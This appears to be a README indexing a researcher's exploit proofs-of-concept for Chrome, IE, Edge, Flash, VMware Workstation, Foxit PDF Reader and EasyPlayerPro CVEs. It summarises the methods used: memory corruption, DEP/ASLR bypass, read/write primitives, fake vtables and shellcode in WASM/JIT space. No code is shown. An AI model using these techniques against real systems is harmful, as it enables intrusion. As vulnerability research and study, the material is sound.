| CVE | Platform | OS | Description | Remarks |
|---|---|---|---|---|
| CVE-2016-0117 | Microsoft Edge | Windows | OOB Write when performing PostScript operations | From my knowledge, no PoC available. I recreated this from listening to Mark Yason talks on YouTube. No RCE (and sadly no time to construct a full RCE, though it should be possible) |
| CVE-2019-0567 | Microsoft Edge | Windows | Type Confusion via Chakra (Edge) JIT optimisation | |
| CVE-2020-0674 | IE11 | Windows | UaF via Chakra (IE) in Array object's sort function |
| CVE | Platform | OS | Description | Remarks |
|---|---|---|---|---|
| CVE-2012-1876 | IE8 | Windows | Heap Buffer Overflow when updating HTML Col Element | Obtain full RCE bypassing DEP and ASLR by using overflow to get information leak before writing Virtual Function Tables |
| CVE-2015-3104 | Adobe Flash on Firefox | Windows | Integer Overflow when updating Shader Object via Shader Jobs | Obtain Adobe Flash sandboxed RCE bypassing DEP and ASLR using overflow to first build read/write primitives, before using the primitives to write in shellcode and write Virtual Function Tables. This vulnerability should be found across most browsers and there are Adobe Flash Player sandbox escapes for these specific Adobe Flash versions (17.0.0.188 and prior) running on Internet Explorer |
| CVE-2017-4905 | VMWare WorkStation | Windows | OOB Read via uninitialized buffers | Obtain information leak from vmware-vmx.exe stack |
| CVE-2017-???? | VMWare WorkStation | Windows | UaF via Drag-And-Drop RPC commands (dnd) | Obtain full RCE bypassing DEP by creating fake Virtual Function Tables. Chain with CVE-2017-4905 to bypass ASLR |
| CVE-2018-17463 | Chrome | Windows | Type Confusion via Turbofan Optimisation | Obtain Renderer sandboxed RCE bypassing DEP and ASLR by creating read/write primatives and writing shellcode into WASM/JIT space. If W^X is enabled on JIT space, JIT shellcoding should work too, or just use WASM. |
| CVE-2018-9948 | Foxit PDF Reader | Windows | OOB Read via uninitialized buffers | Obtain information leak from foxit.exe stack |
| CVE-2018-9958 | Foxit PDF Reader | Windows | UaF via Foxit PDF Reader Text Annotations | Obtain full RCE bypassing DEP by creating fake Virtual Function Tables. Chain with CVE-2018-9948 to bypass ASLR |
| CVE-2019-13764 | Chrome | Windows | Type Confusion via Turbofan Optimisation | Obtain Renderer sandboxed RCE bypassing DEP and ASLR by creating read/write primatives and writing shellcode into WASM/JIT space. If W^X is enabled on JIT space, JIT shellcoding should work too, or just use WASM. |
| CVE-2019-13768 | Chrome | Windows | UaF via FileWriterImpl API | Obtain full RCE by creating fake structures and fake Virtual Function Tables. Chain with a renderer RCE to enable mojo communications between renderer and browser which is disabled by default. |
| CVE-2020-6383 | Chrome | Windows | Type Confusion via Turbofan Optimisation | Obtain Renderer sandboxed RCE bypassing DEP and ASLR by creating read/write primatives and writing shellcode into WASM/JIT space. If W^X is enabled on JIT space, JIT shellcoding should work too, or just use WASM. |
| CVE-2020-16040 | Chrome | Windows | Type Confusion via Turbofan Optimisation | Obtain Renderer sandboxed RCE bypassing DEP and ASLR by creating read/write primatives and writing shellcode into WASM/JIT space. If W^X is enabled on JIT space, JIT shellcoding should work too, or just use WASM. |
| CVE-2021-38003 | Chrome | Windows | OOB Read via JSON.stringify() | Obtain Renderer sandboxed RCE bypassing DEP and ASLR by first leaking TheHole then creating read/write primatives and writing shellcode into WASM/JIT space. If W^X is enabled on JIT space, JIT shellcoding should work too, or just use WASM. |
| CVE-2022-1134 | Chrome | Windows | Type Confusion via super() property access and Inline Caching | Obtain Renderer sandboxed RCE bypassing DEP and ASLR by leaking blink objects' addresses and their respective v8 addresses using arbitrary read primitives, before constructing fake objects to obtain compressed r/w and addrOf primitives. We then write shellcode into WASM/JIT space. |
| CVE-2023-33693 | EasyPlayerPro | Windows | SEH Overflow via LoadConfig() | Obtain code execution via an SEH Overflow when player runs and attempts to load configuration file (if available) due to the way strings are parsed from configuration file to the executable |
- JavaScript engine nomanclature can been quite confusing (especially regarding those released by microsoft). The JavaScript engine used by IE and earlier versions of Edge are both known as Chakra. For IE's Chakra, the DLL which implements this engine before IE9 is jscript.dll, while the DLL that handles IE9 to IE11 is jscript9.dll. All this information can be found at wikipedia and this research article by Microsoft on the evolution of JavaScript engines in IE and Edge.